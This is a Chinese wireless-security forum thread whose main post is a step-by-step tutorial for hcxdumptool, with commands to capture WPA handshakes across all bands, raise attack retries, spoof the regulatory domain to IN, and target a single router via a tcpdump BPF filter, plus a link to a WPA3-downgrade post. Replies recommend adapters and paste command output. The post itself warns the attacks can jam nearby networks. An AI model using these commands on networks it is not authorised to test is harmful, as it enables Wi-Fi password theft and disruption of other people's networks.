无线论坛»论坛 › 无线安全 - 有影响力的无线安全论坛 › 无线安全新手入门 › hcxdumptool 高级攻击工具----简单篇

12 3 4 5 6 / 6 页下一页

返回列表

查看: 6477|回复: 65

hcxdumptool 高级攻击工具----简单篇

[复制链接]

上上网

3362 回帖	2万积分	4795 小时在线时间

大校

注册时间: 2015-5-1

金币: 16904 个

威望: 12 个

荣誉: 1 个

发消息

累计签到：1 天
连续签到：0 天
[LV.20]漫游旅程

发表于 2024-1-31 14:10 |显示全部楼层

本帖最后由上上网于 2024-2-18 14:33 编辑

声明:  使用此工具前，你必须有攻击网络的权限, 执行持久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。

工具hcxdumptool 6.3.2
下载安装最新
依次执行以下命令安装
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool-master
sudo make && sudo make install
有下不了的情况, 这有文件放进去执行上述命令即可

接下来
首先，设置到畅通无阻域是成功关键因素
sudo iw reg set IN && iw reg get

查看一下你要使用网卡接口
sudo hcxdumptool -l 或 sudo hcxdumptool -L

执行捕获你网卡支持所有频段握手包
sudo hcxdumptool  -F --rds=1

默认自动使用网卡接口编号是wlan0,  如果有插入多块网卡,需对应你自己要使用网卡接口位编号, 例如要使用-i wlan0 或 -i wlan2
执行
sudo hcxdumptool  -i wlan0 -F --rds=1

从2.4ghz到5ghz历遍一次攻击周期约1-2分钟 ,  -i wlan0  网卡接口位编号, -F 使用网卡支持所有频段,  --rds=1 排序,  文件名称默认使用日期时间命名,  如要指定文件名加参数-w, -w SSID.pcapng  可用SSID 或MAC DCAEFB命名
如果信号较差,  又必需要捕获到有效握手,  增大重新攻击重试, 工具默认值是: attemptclientmax=10 attemptapmax=4
sudo hcxdumptool  -F --rds=1  --attemptclientmax=100 --attemptapmax=100

如果要攻击单个MAC路由器信号
1 > 先扫描一下2.4Ghz全部信道, 普通模式 --rcascan=p    主动模式 --rcascan=a  如果网卡支持,主动模式会有信标响应,  可按响应计数排序--rds=1
sudo hcxdumptool  --rds=1  --rcascan=p -c 1a,2a,3a,4a,5a,6a,7a,8a,9a,10a,11a,12a,13a,14a

或扫描你网卡支持2.4Ghz+5Ghz所有频率信道, 使用网卡支持所有信道参数-F 如不加参数-F 只扫描1, 6, 11信道
sudo hcxdumptool -F  --rcascan=a  --rds=1

2 > 设置网卡为监控模式(如果有插入多块网卡,对应你自己网卡接口位 -i wlan0),  如果创建BPF过滤器失败情况, 需要执行一下这命令
sudo hcxdumptool -m wlan0

3 > 创建BPF过滤器, 需添加你网卡接口对应编号-i wlan0 攻击单个目标MAC: 00:00:00:00:00:01    创建BPF前需要执行一下设置网卡监控命令, 否则创建BPF可能会失败情况
执行创建BPF 攻击单个MAC路由器
sudo tcpdump -i wlan0 wlan addr3 000000000001  -ddd  >g.bpf

4 > 执行捕获单个MAC路由器
sudo hcxdumptool  -F  --bpf=g.bpf

有经验用户, 如要指定对应信道参数-c 如11 和 165信道,  更准确地攻击, 减轻网卡活动周期优化时间。
注意要对应目标信道: 11a,165b  2.4g信道加a  5g信道加b  6g信道加c  是必须, 因为WiFi6不是唯一信道 !
sudo hcxdumptool  -c 11a,165b  --bpf=g.bpf

捕获文件默认在Home文件夹下！文件名称是以日期时间命名, 文件格式是pcapng固定格式

补充图解

更详细信息hcxdumptool -help    或跳转 >>>
攻击WPA3降级从而捕获为WP2握手包
https://www.anywlan.com/forum.ph ... 321&fromuid=1093833

补充内容 (2024-5-28 11:18):
注意: 自从 hcxdumptool6.3.2 之后起版本, 需要安装依赖
sudo apt-get update
sudo apt install -y libpcap-dev

本帖子中包含更多资源

您需要登录才可以下载或查看，没有账号？注册

使用道具举报

上上网

3362 回帖	2万积分	4795 小时在线时间

大校

注册时间: 2015-5-1

金币: 16904 个

威望: 12 个

荣誉: 1 个

发消息

累计签到：1 天
连续签到：0 天
[LV.20]漫游旅程

发表于 2024-6-6 10:46 |显示全部楼层

本帖最后由上上网于 2024-6-6 10:56 编辑

我自用过感觉较适合一些网卡系列
Mt7612u 2.4+5g 最好是外置天线，Linux内核驱动

RTL8812AU 2.4+5g 外天线目前不是Linux内核，需要自己手动安装驱动

RT5572 2.4+5g 外天线，Linux内核驱动
RT3070 仅2.4g 外天线，Linux内核驱动

MT7921 2.4+5g+6g目前是较新型网卡，可能会遇到各种bug没得到能立即解决

使用道具举报

執筆、寫下情

56 回帖	278 积分	105 小时在线时间

少尉

注册时间: 2012-9-20

金币: 210 个

威望: 0 个

荣誉: 0 个

发消息

累计签到：25 天
连续签到：1 天
[LV.50]初入江湖

发表于 2024-2-21 19:13 |显示全部楼层

上上网发表于 2024-2-18 21:26
執筆、寫下情发表于 2024-2-18 20:18
大佬，来了。截图来了，不知道为啥第一次运行这个命令没成功，第二次 ...

这次无线监管区域设置设置为IN了，好像还是显示不支持WiFi6呢？大佬帮看下

└─$ iw reg get
global
country IN: DFS-UNSET
(2402 - 2482 @ 40), (N/A, 20), (N/A)
(5150 - 5250 @ 80), (N/A, 30), (N/A)
(5250 - 5350 @ 80), (N/A, 24), (N/A)
(5470 - 5725 @ 160), (N/A, 24), (N/A)
(5725 - 5875 @ 80), (N/A, 30), (N/A)


┌──(kali㉿wifihack)-[~]
└─$ sudo hcxdumptool -m wlan0

Requesting interface capabilities. This may take some time.
Please be patient...

interface information:

phy idx hw-mac    virtual-mac  m ifname          driver (protocol)
---------------------------------------------------------------------------------------------
  0 3 001uj4321714 34dfk2ddijk0985 * wlan0          mt7921u (NETLINK)

available frequencies: frequency [channel] tx-power of Regulatory Domain: IN

  2412 [  1] 20.0 dBm    2417 [  2] 20.0 dBm    2422 [  3] 20.0 dBm    2427 [  4] 20.0 dBm
  2432 [  5] 20.0 dBm    2437 [  6] 20.0 dBm    2442 [  7] 20.0 dBm    2447 [  8] 20.0 dBm
  2452 [  9] 20.0 dBm    2457 [ 10] 20.0 dBm    2462 [ 11] 20.0 dBm    2467 [ 12] 20.0 dBm
  2472 [ 13] 20.0 dBm    2484 [ 14] disabled    5180 [ 36] 30.0 dBm    5200 [ 40] 30.0 dBm
  5220 [ 44] 30.0 dBm    5240 [ 48] 30.0 dBm    5260 [ 52] 24.0 dBm    5280 [ 56] 24.0 dBm
  5300 [ 60] 24.0 dBm    5320 [ 64] 24.0 dBm    5500 [100] 24.0 dBm    5520 [104] 24.0 dBm
  5540 [108] 24.0 dBm    5560 [112] 24.0 dBm    5580 [116] 24.0 dBm    5600 [120] 24.0 dBm
  5620 [124] 24.0 dBm    5640 [128] 24.0 dBm    5660 [132] 24.0 dBm    5680 [136] 24.0 dBm
  5700 [140] 24.0 dBm    5720 [144] 24.0 dBm    5745 [149] 30.0 dBm    5765 [153] 30.0 dBm
  5785 [157] 30.0 dBm    5805 [161] 30.0 dBm    5825 [165] 30.0 dBm    5845 [169] 30.0 dBm
  5865 [173] 30.0 dBm    5955 [  1] disabled    5975 [  5] disabled    5995 [  9] disabled
  6015 [ 13] disabled    6035 [ 17] disabled    6055 [ 21] disabled    6075 [ 25] disabled
  6095 [ 29] disabled    6115 [ 33] disabled    6135 [ 37] disabled    6155 [ 41] disabled
  6175 [ 45] disabled    6195 [ 49] disabled    6215 [ 53] disabled    6235 [ 57] disabled
  6255 [ 61] disabled    6275 [ 65] disabled    6295 [ 69] disabled    6315 [ 73] disabled
  6335 [ 77] disabled    6355 [ 81] disabled    6375 [ 85] disabled    6395 [ 89] disabled
  6415 [ 93] disabled    6435 [ 97] disabled    6455 [101] disabled    6475 [105] disabled
  6495 [109] disabled    6515 [113] disabled    6535 [117] disabled    6555 [121] disabled
  6575 [125] disabled    6595 [129] disabled    6615 [133] disabled    6635 [137] disabled
  6655 [141] disabled    6675 [145] disabled    6695 [149] disabled    6715 [153] disabled
  6735 [157] disabled    6755 [161] disabled    6775 [165] disabled    6795 [169] disabled
  6815 [173] disabled    6835 [177] disabled    6855 [181] disabled    6875 [185] disabled
  6895 [189] disabled    6915 [193] disabled    6935 [197] disabled    6955 [201] disabled
  6975 [205] disabled    6995 [209] disabled    7015 [213] disabled    7035 [217] disabled
  7055 [221] disabled    7075 [225] disabled    7095 [229] disabled    7115 [233] disabled

monitor mode is active...

bye-bye

Anywlan官方QQ群

使用道具举报